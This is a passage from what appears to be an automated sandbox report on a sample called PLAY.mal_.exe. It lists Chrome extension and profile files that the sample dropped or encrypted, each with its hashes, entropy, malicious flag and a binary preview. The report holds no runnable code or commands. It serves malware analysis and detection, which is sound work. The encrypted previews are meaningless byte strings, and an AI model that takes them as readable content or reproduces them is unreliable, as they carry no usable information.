._D..wI..;.$@.Q.-.J....".t...e..2.R.E.Lr>w.P.3.$n.|*q......i$.#..'...t.Z^..a.....o..+..Q.S.?l.........e....,>....x./HX..KT)O..o=...c...*.rS...e..y..]]..=H.B..(......BVMr.S..Nn*.].....i8A.r.}.f...s+......(|.G7n.....p...X..E>...ww..\. .j*>n...s.!......7Jp....v..c..V,....l.[....X.\...Y.3I...1.X.1b.Xx.N(1....

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\dasherSettingSchema.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1928
        Entropy (8bit):7.909292335008815
        Encrypted:false
        SSDEEP:
        MD5:8C52FE9B3C2CB1F1133DA35AABE3E4E3
        SHA1:3C960098BB6057BFF72342B88BCED602A8D89153
        SHA-256:B8920D3090351EE889E176DCE4581D4B0806016C52FAD8EAAC9AF515BF149A1E
        SHA-512:EED57EB8FC26EDC609D807A9BBC12341E6344E39F07C609C702453C37969815B3DC5543B03649EE3B176F82D465B7E5E00A256721A087CB03FB9BC79EE22940B
        Malicious:false
        Preview:l4.K.VZ2....7..=4..)s.uj...N.....j".7;oO..y.k.E.G%.^....S..3{..]`.l.?.G=.g........'.s.e9......O..!gY.\...}..+MRa...m.ql....:...o.s.kU.'.NK...2.5..A .....'..U.\.1..[.3.a^P.r*....`*...C-%.[.h..c....C9[.V.(.d&...]..{.+.qtx.+.f..X.'I&...e.4N..!.^......zC... .T.=_.K....u.X..f...i......9.$RAI....%HM}..\.....[..a?o.9`m...9...sH\...L.^..}../..i...O.\.m...t#{.{/`Y..mg.#.r;E,.X.n...5)\3m.......C.d..}#..,..T.E..*.(.h...>..c....)G.u....d(.h.3.X .....].v..X..h@b...~...L.ap.T\...'.V7...6A.t.....N...:).}.FV.....R......[..f^F......!......VK-.yG.$.....a.......T_..R,....r.....?..X.67.I.......l.".....u....I..7%o....r.6....-)..L@.Z$......&E.U......C`..*N.....Kh..t...,3.............gVi.&.k.|t. ..kae..\.~{D..9=....*2....P..)...."..}.-...&......m...I...cQs......:]...?...gw^.\.Ug...f....x....h.[(.O....7y.y.Z.....m.eOvIVLp._...T..U.|.!.I>..........................R:.W.N.. ...-.\o.Hi.l..M..t....o.1..17..:...._/NH.].,.!.g.8.D.jM..T...v......aXJ..3...>...\.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\eventpage_bin_prod.js

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):68872
        Entropy (8bit):7.997551546828867
        Encrypted:true
        SSDEEP:
        MD5:9CAE7742980FB39EDE675EDE438F2FB7
        SHA1:82A808402A886CEF8A65132721A077A1B9A104FE
        SHA-256:ED992112E9933282BA6D8397D415A537A6E9677A187BAC6C9E59296B9244C4D9
        SHA-512:E06691C6F7139762F8F13B7358D23DA753DAC1F64427754ECE0106CCD656B59553E11600589C96956B848A92C7D66FEDA3F4A93A32482F0DD9626194C5326771
        Malicious:true
        Preview:8P.y.oK..6&hE:....Z..u~.Rr.h.X0....,..V.... ..h.7b*.4..{.&... ......<!.S...syo5....r5....D^.P!..@..c-B-..w....o.0...H{..8|...P....k.ts..e..K.....}.X\...P......g`..y.....O...../.,)T(...."....|S`....^.&...}....wM....I..\C.;s...8.U.......A.......MZ1..F~...WA.qN..=.O.e.9@M..>V.....FS..........[..~...U..Y.9Q.O{..bG..*hP..V...%L",z.N.+b}...N_.^w.~.O...~v.7...h.....t.;.G_l..<K....^!...P.s.!..5.3P.).0....-.f...7...!`.Z..m...V....P..!.R...W..........~l..i.r.g..q...R.jnq.d)...|N|..%..#].n"`#3..J.O#*..OW../.....kI?".!....G..S'....i.Db.zS.SMj.I...i.gP.S5.p..]...@...~....u.X`BK.../.h..0.N.`....*.#.0FI.*.{.z......D.i..hi_4^..1U..u...T...J....y.3....&..f.F. .....D2A.".F.6E..a.#x^..(s...]y.....u.z.....0.:$.pw_...{l.....!5..mx:......b..H..CE..|...^..1..u....H.]8t.lj....D....O..)..b....M......'...#Qv..A..A...f7....ow.k.4.].E.v ..(.@..2....4^.S......A5.?..Q.........#.T{.|\$`.....,GH.H..2......xUR..zY.L.A..[..7w...tBs..k.............+,.)..]cd.1....0&7..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\manifest.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2600
        Entropy (8bit):7.933759660805361
        Encrypted:false
        SSDEEP:
        MD5:D420564A9A2A80EFB53FA81E1E278816
        SHA1:A63413812072C46873B87E8B21B3153A0C912BE7
        SHA-256:EC6920BF72D01047AD51F367BC9295742D29FF0748C83CE3534CF4B558DF583C
        SHA-512:6D42AD752F27C68FCF48656B56A509ADEBB427C51863562DC8A41EEE2FFD5635A8D5B9E0A650684F9C0A819CACA0ED8AEB01545E579C0367F228CBAB658D5624
        Malicious:false
        Preview:..g..S.MzA.o[B......b.O.=.....M&..\m_..F..l...OK.!."...I..6,..3.._..x.IM....T.....@..r...9]:..k,.T.M.;2O}\.w...+......~....B.2.o..v7).=E...D-..M....p"..N...F.R..{@`..X3x....^.{._v.L......`k<.YgH.#.4.Y.Y_A~L..;.*n.MTu.....o/..rq0.w.8:.+.Bb.6.....:.h.U....Z..!!}..t.../w.d..b.n._..:........2F..N.b;..R.\Ia......?w...Z....3.(f........i[O.$Y2..FP\..u(..!.....i......k.K.j...J.o.?S.#..).T..2.jUXr..%^.......|..+>M..\...$....R.("B.z.-n......h.q..6...........o.^Q.K.CK....z.I.|.Q>.}.%...s9..k.7\...b..TRi.Y..."..Xuo.....?5....R.hO..=........X:..hk^.m..1X.4.......,..N;..U;3..{\....9..JB...E.........c......C.U.A$........df..........y...B..jP=.]f\@.w...n'...=G.......>&HL6:I...ch.....1....P.!<........W.....G............;.'.Ed..`.t.!9+'b.L--...7......yO..|.../...".q..... .3.,.......G.H.U/n..{..LJ.W...1..a{..,.O..jl. 45(.......<.\..f.<...2.....\.6.*...D..LAh...H....8.x....BG...[.r..b.....zF.....u..P.N..\.>=/{.$.n!.x.]...<nve7A...zNc..C.....tI%v.f

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\page_embed_script.js

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1320
        Entropy (8bit):7.847279568069187
        Encrypted:false
        SSDEEP:
        MD5:AAE08AF6AFC76BD5CB5BC4A71218FD5C
        SHA1:383B4189B3E5C64F23E1D11B7368205581C25323
        SHA-256:EAF2654B2DA1793DCED0502C8F1ED59660E13A0A454651F362881BE460CAB073
        SHA-512:203D94269CC4134F6F187507DE59F116C7E6EA291A1857CFEE26985C8D95D84787E4949E81A241D5E8D24FA2513AACB22E0892D30A6C90B5AC015D5D2DA427D8
        Malicious:false
        Preview:.|^........*.1e.....H.yiV.RB.........d...7$(.W..7...]......4+.2+]._?.A.\;I2.l........nnU5.y;y......wD..[..k.....Jz.;[...".Ko...N./1.<.l.;.p....D..<.{....(z.v...-.".........n.:....Y..r....f.%c......w.J8c.c..f.aU......._7..]..n...2...!#.....x...T..U.|.!.I>..........................#m..I....C...`s.@...q:.*.v8.L....,....L.L.E..\.<.C....Q....q.".]\.!..-. .. .D....._%...3S..J..r.v.1..h...@!.8.Q...4......I..&...kXf...Y..s....9."..X.KT._/:(.V.B._i.......`.aL...#v5-$.. .....b.A......}q0f#.-.u.m.a.x4.F...W.]..!....W...$.y......aO....bq.=.rt...>.Gt....*eJ..eJP..d.........kc...y&.........n......(.J.DB...q.H.5..;...<c~.`.d.,.....3....# ....3..p..=.......l.y.....d6../..2.;(W.6LC...8m........o...{W...c...P.....z.*..BB...{.-&e@W.>_.gc.Y.(.}.m7..x.`f.!....8...R..D.x.D.Hr..u....f5s8T"......v.6.eO.#.ed?....k..U+`....*%.Z..V;.9.W*...kf.Xt...9..V.J8L.z..qb...!]..Q...YT..Hx......z.~h.^af.uR...E..(...M..w...J60..4..m.u..~k<~...%. ...w`$#.*.P'......{.. .....

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):545720
        Entropy (8bit):7.99966238657806
        Encrypted:true
        SSDEEP:
        MD5:5A3B814FE6962A2028C1D26A50340EAA
        SHA1:4A33371D8C1CB656732699591712E25D97C4161C
        SHA-256:10D3E0257D2FC1DD6FA7DDEBC1BF194E03CE1AE49A62AAD2A8B8525216484721
        SHA-512:82531B281D5B45F3CE13ED92B4154D2C68761CFD3091949DE92092E64C60D2F62D8DE5F97FB6D69A08AB94795116D3C1E4AE5369F38748414893165CD6FB0A21
        Malicious:true
        Preview:..(.D./.........D.t..JC.u.U.@...3 ... r.....Y .....k.@<w.......@.^+.G..(w...Y./....?H....L.._....<.....$HF......e9..P..f.......,&_.]>..3...B`..H^.GM.wQ....1.{:|Ib...S.O....J.".n*.J..)....h./.#...!. ..}.Nn..@4....\.[d..6..0..a.Yj.f ....q|..K....>.Z....c@a)...Z.p.s....3.h....-....R.h0....2.._O.....;]lG7\#\u.........Y'M1c....}O..........[5..g..D..Y.f5..n...;DP...1K.no.e2..]q.O.A...d1.%..HM.....X.).l....*!e.Y7....9.N.0.. ..-..6....~..nQ#Y...Z.a.......;..]2;..rt'[....w.?..;.<......&...S..d..{......{.9..1....#Z]...1Ve...EY..W|.b,.......<..F...b....t.O..|.w*.p....y:+...x...t..+.L....uJ.(..1Gl....&..b..L0o..cH......N...".!+.q+..K..ov.....!..X.-..F.pPe..`<..JU .....&..'.n....(.h...P.p......R4.....\.){..`".4.:........!.%...2....{.hw.&.R..&...U...+$..I.....ba.!.....S......K.....4R.i..............BN..a0...{...........S..=.@.....Q..).u....]T]...[.J......|'...An.....W8..L....9.a.!.D.........{...,..{...6.W=.x.....a..S...K)K.....?.#..(.....[.~.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):262392
        Entropy (8bit):7.999348383049163
        Encrypted:true
        SSDEEP:
        MD5:91E55FDCFAEC2CB598DC7111A5FB2442
        SHA1:9B1609BCAF1186AE015C3238133D2B8237BBEEC7
        SHA-256:4E94E77D5C9F319BD371A03F7FC892EBC58B154E163AB1BB2B5D47E98D6001F3
        SHA-512:0FE360678B126155D5DF690C1E2C87F4FF2FA5DDE049572565E726D79E018F4281A4E0C66D2540ED738FFA0005938B37B5E7692FC264EF76CD880D912DC01A1D
        Malicious:true
        Preview:P.(....GC$E:.......r.e.i.....,z5..zM$..0P[...H.l.Z.6|.^......E.Ag.hf..Z.B.Jr.V@........K.....&..z.".K..6....&..-...'. -....g......7._.`.?..A.....)...W.".<K@...5.......AC.9d..3:OV.Nf.\2...n......J.u.9..9...W.<L%.^..?...O..-.I...1.....0V.....i.e*...e.4 ..B.q.{..]...Fyq.......C'...UfRkv`b.H2..j.q....Y...k....;Tk..@..(..V.H..H.zX....K...w../o.@B....h%.....U...#.m<P;....Y$2...j?.....4...?.S...5;RJ5>.vW.b..........Z.M......2 l.,.X {.X..L...rS.....`.dV.`ue.2...MU(A.tJS.C......S.S..M.b.-Y.F............X.t0+..E..\.Q...*..wC..#...|..4.........S...H.......Z1..i..'..).Cg|$.$..=::...k.".k...1@....T....X..9fv..eas..i.N..{4......_>c!......8R..{..N=.<.eb....Ox?z.B.`...}.&. &...i._Q.....?.%.}.vIk.E'G....@........M..........w..'Cq"|.O}!...~...!..a ..>.Ss..Q f.g{..>.3.%../-.!..2..^U...h>Z...$.......Co....M_Y_w .;.ukG..=.>..`......:e..3h....o.aRI ....X....?`....=..,..}.....1Tl.EpZ.S.[.'O.E..${.C.*......kg%........8..H..WN...E..h.d.6...4.V.h.OH...|.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\craw_window.css

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2808
        Entropy (8bit):7.918428618582969
        Encrypted:false
        SSDEEP:
        MD5:CE7038D932DB3C697B70515FBFCB1AEC
        SHA1:9F471B3B8F422FE75FCD5E300F231828938F8EEC
        SHA-256:FCDD58F32B7468712631FBA0FF76C0DBDE25E7676F51DE41CD833B48A13DD22A
        SHA-512:5039C0DF362C729CAD91635DE2046E830E295761CBB44CF216C4747C306CABA14962CE44F1D7DAACABC0B7F822458A832AC20A6B8D2CFCED999FEE0ABA516B4C
        Malicious:false
        Preview:;.h..>.....j+K(..9GI...4v.-...b..y+....t.8../;..P.[...6g..L8..K[5...ru.X...b..E.{].....c.U...=..B....[.y-4........W.K........l...6......;./w.c...0....o.......a$O.G:'.K.3.\....uC.^8..;.O.....&s.qx...u[..w]ej.).R3X.6......8.22./.1.~.y......&.....Q{Xy 1,P....Q.....o.}.i!..N.........$... ......l..........sd..^...".=;R..M~.K./&9U.K..;.v.g86...LM.=..k..V.nW.A.<.GU^Y...`...TE...I.\.y.p.....-`....P.x6.jR.Q..3c...D...{...o...{W(t........".1..(.-...R.M..2x..}.M.-..i...4../.$.e.N\u7.V.R.fsvM8.......2k.{`.H..:.d......P...z.z.$g...w....\...j...uy;...W..ez9.RB.9..*..G..PV.8..k....WpJ.sQS-4_....~....;..w.`.p*....).ty.._.`>:.3....A .|N,..5o.6......F...A...s......j..,...':.....HI.....-B.-.t..: .*.MB..)^E.#>.9..kD.../......._ao/....1>...R..lW|....e....l9~..6.....b..K.....s5..4....B.y..._._._..CFUM.z....~.v.....y.M...{..#..yP.;.RUM.a...}.#`...s*....?)UO....S"J.U....d..^.......[.!6..L.e.........<9.f_H.4D.....@..kIcWm...,.u...N6.....DH.T.@.!'Uy..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\craw_window.html

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1880
        Entropy (8bit):7.8974519227719355
        Encrypted:false
        SSDEEP:
        MD5:C7F2B9E20959BB9A90C063C1EC0BFA64
        SHA1:E716FD53F6F94968538DA85DFE40FF86CBAB8E21
        SHA-256:8B7F00C8DDEA1CD3ABFB5E7C634BC74B63BA74D5BB4957806817C0F9FC5891F7
        SHA-512:3AC920F97144502D61B4B5755EDB8BC90BC43FD96824E102FDAB81C24E119BEC78BAE9DE331CA767256AB2532CCF1B1AFBB6CF25D2A757E1C78EE1D9E11900DB
        Malicious:false
        Preview:m.C......?0....h.......6'....>.nN...5.Q....,..B.._.r}../.A....e......S....i......\M^).lHD4.W.]..@.....j..?.M.%}lXT....;......~KBvY.v..i.6.7.N.<..q.`..TW..DIO..va......x..n\....`v.z...l?0....vwz..%fm.CJ..-l.v..]."lX@t[..z.2...9.h.`1"L.+....X.F=...*..}..%..N?..}.....YO...=.. .#J.Z%^23..>....b..I....0{.e.P.u.x....rJ...2...ln2.Qv%...I&..iq'.........9P.4...ck..+....%S.;.....H..1..ks@).H.XQ.h`....Z#z....-.iH...H...(.,(.#..+....i..(..s..y.m....r.8Q.p.].....O....2q..@Ud.=..B.Tc..';eG?F..#....P5.p...mVy~.......]._.....S.My....8'..w;.t....E. ..p=b.N*.d....}..f...Ca<1..........d.?.%I=.r.Pw../...g...:........f...nyN.~2.+.N.".`....e....e2..z{.r.n'..-..1!;&5.@?...I...=..nc.w..8...H..K.n._.w.n-im...G..l.W.(i..K.....X...(1p..h..o_.V..R#...d..T..;&..q6...>.f...\...0.....(.z.2....}.b...T..U.|.!.I>..........................d....T.....'..^.r.....{......G.<.#..B..u'..M$.)..Yav.0.ZQbz..6..KD;G...Ww.....o._.....TS$..i...PU..>........o6#.3.9..Q`q...}t.J...7.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):71432
        Entropy (8bit):7.997232320374958
        Encrypted:true
        SSDEEP:
        MD5:E245D1BD71556BAB7F7119A21F7C3DDC
        SHA1:38ACA64B99B4DB9F3A05A9E31814477F816C3C78
        SHA-256:0CF4980DE0A6103F9CDEAC7B0C95FBF8D019A7C8A3B683C529BBC2ACD6648EAD
        SHA-512:6CB16C011FEFB6EC7CA01174F5E9EFA820868CB1569833EF595401DF628DE4E1CE86F722CD9D074EC60D6C1777CF6CF8F45D5C686B497C98F837565ED3B6CB97
        Malicious:true
        Preview:..I.k&...+JH...S.@...5Ns%4pi0W...cN.......5T.\.....S&.......9.Y...D....!."|..."r..........x#...Q.y0>...i.tz 0..}.#..ipk.S........aV.....&"....&$T.........ml......x...<.2`.,..D.f..9...N.....^.I.....Y...#...Y....^yw3.a....p...M.'.......^lU.`..J.D..S./.'\ngVR4.07........U.j.X6{E.?.3. ...=4.R..yMa...0.y.........b.?jh..jh.3&...(.~Y..c[s.Q82..lEw/;.N........E.N...Y.Z.HW|n....x...MfJ,.V.(.......P.1.(................w...#...R.......8.............<Iu..C.M.._..g..q...F...D.Q.L..T[...8c|.nrA.......F..Rp...D.O.2E(LJ.@.q.2.ic....?.....e...p.R.Jq....E..SD.[GI...}..F..y..T..........KG..Y.=JYS....g.N....a'....l.._...j.`".;.Jw.O...'....~.0X..G.rX:..+']@...p(9..JG,.4e...*.O.-...p......1G.MQC'u..,.vG..7.h..p.0..[...V.i..G}.L..Q....r.........{h.nv.z._.|tmpy..^..Z.>G.....o?..~'.J....s..3t.6.M^..JvP....Z).K....:3N.|.D0$f....Vb~j.l.X{;.._.$%..P....FC.+.):..~..tJ^....26.k....[.#.F..~.........Y....@}u...Xh4M}._lF...{.E....~9RK@.j;.P.^...d.....\.(...p..k..._....

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_128.png

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5432
        Entropy (8bit):7.9586679695448
        Encrypted:false
        SSDEEP:
        MD5:2416298AE56883F6B2141B080EAC9E34
        SHA1:C4823F3BB4A4BE7968A030434F4D32513C2FD3B7
        SHA-256:618249DBCF8DA2EF74525222147FB7481B384C62464FFC0EE95965B766D3FA77
        SHA-512:18B29082CD77BF2DA4E6F60AF5E0188E8363D26F2F61416B4B39DAFB2BF839E991A34802F766DE717402917230E75D1D927C484DEB0E6411C46A62F1C1EE09E5
        Malicious:false
        Preview:P.}..P^XaA.\l...H...D..<.1.../mT.R.......I.~T..R.&......T.G.2.J....p...B..^]L.........2..<.2.].`..])16....!....He...=....w^7.6&......0...R.?cX.A......&...@zZM..9^..1..D.FF8/..c..I..3Y_%..a..S\u./.j.9...u.:......1.~......l...\.M.#`.Mg$J.2.C......OV../....L^..EJ....8.s1...vD./.1.......O....=....i....."..a{...Ts.]..=.O.E.....bC..%.n>..i0Q.P|.}.-.K..i,....J/s.V......"...: ...z..C..l..]..nf...!Dn.c..{._.SLS...M..8...g}.5..3.....3....... 2".t. ..,....Z)?p.....\.,.....yrN...2...x.HZZ.A.;...?#F..?%...M...fW...0..C...#.z.....>T...9.oc.j..Ze......#...,../. 9.=.P...V...j.G..z%.7:SU/..=08.p..WO.*..6..%........N.2...!.q2.*.r...S.....{.z".E..$..A...w...A.o....Qm)...4....UY@...y....#....} .z.......f...E.....{&......X4..X)L..... C>.R..I. .n^$#N.~..9....##in.T......B=.5.ws..Z.I.q2..|.)..).HL"...&|9@...i#.A.U.a.=pE..B.D.#../..........N..<.l.|....9.o.;...".>(GR.....x...A.sZ....X..(:..A.....%h.@..]d....k....:h...74.g..i...(@.....?2.1...wk.K.h:O..j

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_16.png

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1624
        Entropy (8bit):7.878156880817832
        Encrypted:false
        SSDEEP:
        MD5:AA9F691905003201687874A8492896F2
        SHA1:14F9B20C5709317E8C8D81FC2EE588264184201A
        SHA-256:137C615F98119490B4B02E3FD7FCA2A99FF8A9A1A7BA79764923B43A4B9B1DFD
        SHA-512:198854476E5DF1CA7CB35C7602D1C8BFA06B77BB6C58B2513525E4DDBD1BF8AAB8A51491F978D8505F8DD41724883387DC01447901124EFA906D57F946238D48
        Malicious:false
        Preview:fc.....t?..h.1v}.;.6...p.6..".b\}....Y>'..s..i..?.F.HR~.....X..V._S.B'A?h.........itA..Q.b.wEY..N...o..<,...>.b}.....C.k.S.u.....J......t..S8.....L\;.....W..:<(:..d..w..bU.l.._Y..3..V..+.`,i3.~_.3$.....ch.+...YJ...K...R.C...Y...9E....Z..M....o..s5+.G..`%...G.l....<......@..06..............%M..LD...E...V.Q{f.h.........x...J.........[...?.5..../.Fi."..$.#ZD..0rY..ue>.%...Y...ePc../.|.G.P5..'.0Y....o"E.a.Y.83*....5.k-......fb.4...{|.<.........\f.B.PB.. ..(8xH:...O....%...z}...o..P.dq...n*.....po~.C....(!.o;..{6..:..o.... R6z..q...T..U.|.!.I>..........................9.I.ab...#Wy...M...`}z....9.0.......*....:)n.....V.y.\.b;p..qZ.u.G.k..9.\[.|+.F.....V..xC..bT<.6..a..P.*>..5.X|...}.&8.".Z7.`.........(.$..;...l..Qm.4.OB.J.&..Y....i....Pa$...k..Tf....1T1..........Y...3....Y.....I.ui...x........+.o\[.$..."...[..ve....j.4uDA.y|.`..Q..gd6?.e..0D.-K^...w.....lh.Y7...Qw.C&...+./K..Qy..xJ.N.6...Ty."...BrFXb..=e9.2..XK.v.l......{3.~R..R....t8.S....m...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1096
        Entropy (8bit):7.77159332216679
        Encrypted:false
        SSDEEP:
        MD5:53B8E6BF7BB334A72640727DD1C5EC7C
        SHA1:70539BB56917D813EAEBB750CFAD02ACC340E52D
        SHA-256:0EF13C12C41D6559FD2E4C594C79522EF6D4A1C2CE2B10E41D7E57E1D625AB1F
        SHA-512:21AEF0DD1D1BA70C8DBEE27E2749F707902397C39AA46160D955428BEAF6C1243EB27A3B7F942568D299B51E7BC0F980E2A9905D9404345BC7B3804FD458C2F2
        Malicious:false
        Preview:.:.)-....;....s..;.5...l`...)...T..U.|.!.I>..........................Qf...s....e$..I.kQ.Z.E......"%..C....*....Y-.^6.F0.n"3..q<..Y*...n.I.......h.I"9w....C.&(j@..@...#......z......[.;..i.......d"q...I,..EG..>...2@.....!.r....M.h....o!Vr..l..n..MR........t$K..$/..W.}.:...W[...z..7...f.7.D..r...`..c....G.r.....h..g..Aq...3...L.]kn...?....F.w.k.{_.....K..E.c.RaS............g..2.X.Tp...P.....E.2..N.%.m..A.mk.>....Q.....l..[..1{.._..._.Aj....uQr.94.)..@#.4.rB...h...nov.qD=+O..{........Y.ag...f.(....s'....h...<.L...l...^.g....A...nJ!...!.+.. .....~.f...C..q>..nz...F4.S@?.....?.....=....J[n..B7..{..g.5..TR..6...p......!".k........eE.w....a..]..4.+..B.<.5..dq.hKf.}p..R7N..b%F.......A.C.+..G5..7..q..%.M...!oG.U.S........hr..H3V.....Y..p"2..~.s.c..7.?q.3....B.M.{..%p.&....~)M.rl 6*...p_O.....C.K.P..P.X...k...6s\.6....iZ...K..{%...|..Y|.PX...bV)my....5.&..(.4m.uc.E.".aA...k...%U\;..."f..S...L...%.......;.8.......... -.+...@...Q(......_..#.J

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1208
        Entropy (8bit):7.800601796600049
        Encrypted:false
        SSDEEP:
        MD5:065366C78F0A253118149148BF795119
        SHA1:107930403692FF970ABB16C22FC98B9034BD3C3F
        SHA-256:CEA22164186F1E4924F9C6D0031950E150B5826D2DCE9B4CE2E3B5DD386F85A1
        SHA-512:0E2097470FE34365B152D7CFADEA5D8403FE1BDFD51CDD59865C8770D23B2C2EC4C12AE587CCE89809A68664AE26A3B36F84D8506B76E228F510B462599E6219
        Malicious:false
        Preview:+..|...........q....7....HYi.:..l.es..^&....ra...=XH..u......r.c.2..v[_....;:.;:...M..........J^......t5...[.=.b..)....WVR..:.c..{....T..U.|.!.I>..........................S$..~O..E....9.VO...Z.}...V.-y.qZ....l..:...<..J1...........[.._....N....@..w....h.=e.].|...4........f.6.3a.$..H*.8.M.\........;Vc[.ZP.............h.h........;H.[..l......|*.g...?.....%+.H.../...f.....f.z.z.....;....`G4...Y...V.[..g....d.k..@\..W..z..&...F.8q.GYF.|ib....4.M..... .'.....e:.Xj.;..hi]..i...~Pd..5"NA.B....`.....M....%.#<N....'c..,..r..-5e>S.@.._7.......f=+........%QC..:.Hyb3P.2dY...^._p.....o.....U.H..S.R1B......y..,..c.R:'..[g._+.A..S.S.&..<......\....^.........+`.u.5S].@>.$.....N..........9...P.jQT..bJ....h&z.^.1.........2.S]...(...k.w..c..#,.........>.......\A7....>...N.Qu....%.g...w`h...9.U..u..>j.ULGd.........;.*q.....`\...EwE..`..A.(.B...v._c5T4..k...gs....J.5.t........1......J.J..<....`..}\..lr.....h..%.t6w ..}M...{{_.ux........m......Nx.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1208
        Entropy (8bit):7.8217617626740585
        Encrypted:false
        SSDEEP:
        MD5:6E53D0863E4A399BAAA3E6F3B1DBEA3F
        SHA1:92AF133189D560077795C9020DF8FF14DB70EAA8
        SHA-256:87A9E3787C749FB4558B05FB7CE6E12541FFA1E9FFE4101FAAE4071D3AFAB670
        SHA-512:D8A50BA927F9FC37CCD8962525AFDA5267BCC2D5B14066B9E2ADBB5CDDA373C8D5105834E45C9160A1550EE5ECB8A96B9B941457543771B71FD5253175B58427
        Malicious:false
        Preview:1....5|..,6...xP....Y..}.. .).q.tC....U.<\...%l.._...D..F..1.rQ...1.5.;..... .7S......C.........K...{.)......n.Q:.F.E.....T/...e.:./9.8 =C@Y....T..U.|.!.I>..........................U...N.!.....Z.k.f.X...|.uG..n...i..y..R.....$..7...v%....Ms.e....C|=D.....]o..5.|Z..n...=...>~L-p.s.l.=.J..O...cVP.&.dM.C..3..\..r.......>...#..3.&.1>..:u..<"._qu(c..@..7.S....C.w...U...IG..^..q.S..u[..$9.h..'..ba,3...S.bT.......z.u....)../;o.a..E.YHUhY.\...4..{...X..g".s\...v....fV..Z..c9...s...:.E.j....1.>C....-...v...j.j#hV8...v0G.s......w..h`. ...*..D.q.<a..n'./..v....".^gem...C.3..o.q{.....&..Z.....%...........]%..J..+`....&.?P.../.D.....j.4w%..&.. .c.A...kQ.R.../..+b.......W...`.5p.:.l...1..._[...Cq.......p..v...B...........6...q(y..\3z.w.k.d..r....cw@.....u2+.....T....Y...3..'}cw ...c..B4."Y..........M.$*K..x..##.6}..^y1/h...AWwom...#zg#..c..'C...a....,.X.z...C....%......l..z~..m...x..GT...1..........e..ux4.#.....].6...&.z.p.yM.l.G6..'.p..J..L.V..[....MiW.e..y

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000008

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1128
        Entropy (8bit):7.795985423862453
        Encrypted:false
        SSDEEP:
        MD5:43B6F4A6F900B696A4603E265900B380
        SHA1:B08472CDF3136D965EC3C4C76625159579AE6688
        SHA-256:1C963445BCBD1C16C80C56EFCBE6A713E2436F63F567DAF6F82AFBDD37E3DE63
        SHA-512:9A1917AE7373EEA669BD891E6CF2BF825E9F0198A7E003ADB595D24253AEEC58E85371121D326AD940362E42C84948212DF5E0F573F6E56F7FD2326F659A7476
        Malicious:false
